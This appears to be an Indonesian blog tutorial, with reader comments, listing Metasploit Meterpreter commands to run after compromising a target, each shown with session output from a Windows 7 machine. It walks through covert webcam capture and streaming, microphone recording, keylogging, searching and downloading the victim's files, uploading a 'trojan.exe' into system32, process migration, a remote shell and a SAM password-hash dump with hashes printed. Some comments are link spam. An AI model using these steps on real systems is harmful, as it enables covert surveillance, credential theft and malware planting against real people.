Pada postingan kali ini saya akan membagikan beberapa perintah-perintah yang dapat dijalankan ketika kita sudah mendapatkan sesi meterpreter dari target yang kita exploit.
Kebetulan kemarin ada yang bertanya juga apa yang bisa kita lakukan jika sudah mendapat sesi meterpreter, jika kita tau perintah-perintahnya banyak yang bisa dilakukan, seperti menjalankan program yang ada di sistem target, mengirim file atau mengambil file-file yang ada di sistem target. nah di bawah ini akan saya berikan beberapa contoh perintah - perintah dasar meterpreter di metasploit
help
Perintah ini digunakan untuk melihat semua menu meterpreter
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
background
Perintah ini digunakan untuk mengirimkan sesi meterpreter berjalan sebagai background
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
sysinfo
Perintah ini digunakan untuk melihat informasi sistem target
meterpreter > sysinfo
Computer : SAMSUNG
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 4
Meterpreter : x86/win32
run vnc
Perintah ini digunakan untuk remote sistem target
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.100 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\Users\Samsung\AppData\Local\Temp\sccHTQrAIy.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.100:4545...
webcam_list
Perintah ini digunakan untuk melihat list webcam yang ada
meterpreter > webcam_list
1: ManyCam Virtual Webcam
2: HP Webcam-50
meterpreter >
webcam_snap
Perintah ini digunakan untuk mengambil gambar dari webcam
meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/PZegxMLF.jpeg
meterpreter >
webcam_stream
Perintah ini digunakan untuk streaming secara langsung dari webcam target
meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: GHqixCls.html
[*] Streaming...
record_mic
Perintah ini digunkan untuk mengambil rekaman suara dari microphone target, tambahkan opsi -d utuk menentukan interfal
meterpreter > record_mic -d 10
[*] Starting...
[*] Stopped
Audio saved to: /root/UqxrMpys.wav
meterpreter >
run keylogrecorder
Perintah ini digunakan untuk merekam aktifitas keyboard pada sistem target, tekan Ctrl+C untuke berhenti
meterpreter > run keylogrecorder
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/192.168.1.103_20160229.0841.txt
[*] Recording
^C[*] Saving last few keystrokes
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter >
geteuid
perintah ini digunakan untuk melihat user server yang sedang berjalan
meterpreter > getuid
Server username: Samsung\Samsung
meterpreter >
getsid
Perintah ini digunakan untuk mendapatkan SID dari user server yang sedang berjalan
meterpreter > getsid
Server SID: S-1-5-21-341670393-1752858153-726497755-1000
meterpreter >
Search
Perintah untuk mencari sebuah file yang ada di sistem target, gunakan opsi -f untuk mencari file dengan format tertentu
meterpreter > search -f .pdf
Found 50 results...
C:\Users\Samsung\Documents\CV.PDF (136731 bytes)
C:\Users\Samsung\DocumentsHowTo.pdf (570012 bytes)
C:\Users\Samsung\Documents\pertemuan-04-klasifikasi-jaringan-komputer-compatibility-mode.pdf (149072 bytes)
C:\Users\Samsung\Documents\TUTORIAL VERIFIKASI PIN ADSENSE.pdf (1170899 bytes)
'pwd' dan 'cd'
pwd digunakan untuk melihat dimana letak kita berada di direktory target, dan cd untuk masuk ke sebuah direktory
meterpreter > pwd
C:\
meterpreter > cd Users
meterpreter > pwd
C:\Users
meterpreter >
ls
Sama dengan perintah pada terminal linux, ini digunakan untuk melihat list dari suatu direktory
meterpreter > ls
Listing: C:\Users\Samsung\Documents
======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2016-02-09 17:41:36 +0700 Bluetooth Folder
100666/rw-rw-rw- 136731 fil 2015-11-24 03:55:43 +0700 CV.PDF
100666/rw-rw-rw- 1992 fil 2016-02-03 17:26:41 +0700 Default.rdp
100666/rw-rw-rw- 73216 fil 2016-01-16 17:22:29 +0700 Drawing1 FLOW EGA.vsd
100666/rw-rw-rw- 570012 fil 2015-12-02 17:39:08 +0700 HowTo.pdf
100666/rw-rw-rw- 1170899 fil 2015-12-14 19:50:58 +0700 TUTORIAL VERIFIKASI PIN ADSENSE.pdf
100666/rw-rw-rw- 8251365 fil 2015-11-23 14:11:54 +0700 Untitled.pdf
40777/rwxrwxrwx 0 dir 2015-11-23 11:09:39 +0700 penggajian_Taruna_Karya
100666/rw-rw-rw- 149072 fil 2015-12-06 21:53:04 +0700 pertemuan-04-klasifikasi-jaringan-komputer-compatibility-mode.pdf
100666/rw-rw-rw- 20505 fil 2016-01-12 14:56:55 +0700 recruitingindo511.docx
meterpreter >
download
Perintah ini digunakan untuk mengambil file dari sistem target
meterpreter > download Default.rdp /root/Desktop/
[*] downloading: Default.rdp -> /root/Desktop/Default.rdp
[*] download : Default.rdp -> /root/Desktop/Default.rdp
meterpreter >
/root/Desktop merupakan letak dimana file akan disimpan
upload
Perintah ini digunakan untuk mengirim sebuah file ke sistem target, dengan direktory yang ditetukan
meterpreter > upload trojan.exe c:\\windows\\system32
[*] uploading : trojan.exe -> c:\windows\system32
[*] uploaded : trojan.exe -> c:\windows\system32\trojan.exe
meterpreter >
cat
Sama seperti perintah umumnya pada linux, ini digunakan untuk menampilkan isi dari sebuah file
meterpreter > cat
Usage: cat file
meterpreter > cat Anherr.txt
Perintah Perintah dasar Meterpreter
by Anherr Blog's
meterpreter >
mkdir
Perintah ini digunakan untuk membuat sebuah folder
meterpreter > mkdir Anherr
Creating directory: Anherr
meterpreter >
Kita juga dapat menggunkan peritah
cp untuk mengcopy file
rm untuk menghapus file
rmdir untuk menghapus suatu direktory
ipconfig
Perintah ini digunakan untuk meliha ip target secara keseluruhan
meterpreter > ipconfig
Interface 1
============
Name : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
Interface 11
============
Name : Qualcomm Atheros AR9485 802.11b/g/n WiFi Adapter
Hardware MAC : 55:7d:68:15:dd:ef
MTU : 1500
IPv4 Address : 192.168.1.103
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::cdb0:307a:4cdc:71e4
IPv6 Netmask : ffff:ffff:ffff:ffff::
netstat
Perintah ini digunakan untuk menampilkan koneklsi jaringan pada sistem target
meterpreter > netstat
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:135 0.0.0.0:* LISTEN 0 0 808/svchost.exe
tcp 0.0.0.0:445 0.0.0.0:* LISTEN 0 0 4/System
tcp 0.0.0.0:49152 0.0.0.0:* LISTEN 0 0 480/wininit.exe
tcp 0.0.0.0:49153 0.0.0.0:* LISTEN 0 0 904/svchost.exe
tcp 0.0.0.0:49154 0.0.0.0:* LISTEN 0 0 984/svchost.exe
tcp 0.0.0.0:49155 0.0.0.0:* LISTEN 0 0 608/services.exe
ps
Perintah ini digunakan untuk meliha list prosses yang sedang berjalan pada target
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System
276 smss.exe
376 Ath_CoexAgent.exe
2968 taskhost.exe x86 1 Samsung\Samsung C:\Windows\system32\taskhost.exe
2976 dwm.exe x86 1 Samsung\Samsung C:\Windows\system32\Dwm.exe
3024 explorer.exe x86 1 Samsung\Samsung C:\Windows\Explorer.EXE
migrate
Perintah ini digunakan untuk berpindah ke prosses yang lain
meterpreter > migrate 3024
[*] Migrating from 1192 to 3024...
[*] Migration completed successfully.
meterpreter >
execute
Perintah untuk mengeksekusi, contoh untuk menjalankan cmd.exe
meterpreter > execute -f cmd.exe
Process 316 created.
meterpreter >
shell
Perintah ini digunakan untuk mendapatkan shell dari sistem target, layaknya Command Prompt
meterpreter > shell
Process 3456 created.
Channel 3 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
hashdump
Perintah ini digunakan untuk dump database SAM
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\>
Itulah beberapa contoh dari perintah-perintah meterpreter di metasploit, sebetulnya masih ada lagi namun akan banyak jika ditulis semua, hehe , silahkan ketik help pada meterpreter untuk melihat semua list yang ada
Cukup itu dulu yang dapat saya bagikan kali ini , semoga bermanfaat
sumber
www.offensive-security.com
terimksih atas tutorialnya mas...
BalasHapuskenapa punya saya tidak bisa masuk meterpreter
BalasHapuspadahal sudah open gan?
Perintah - Perintah Dasar Meterpreter Metasploit >>>>> Download Now
BalasHapus>>>>> Download Full
Perintah - Perintah Dasar Meterpreter Metasploit >>>>> Download LINK
>>>>> Download Now
Perintah - Perintah Dasar Meterpreter Metasploit >>>>> Download Full
>>>>> Download LINK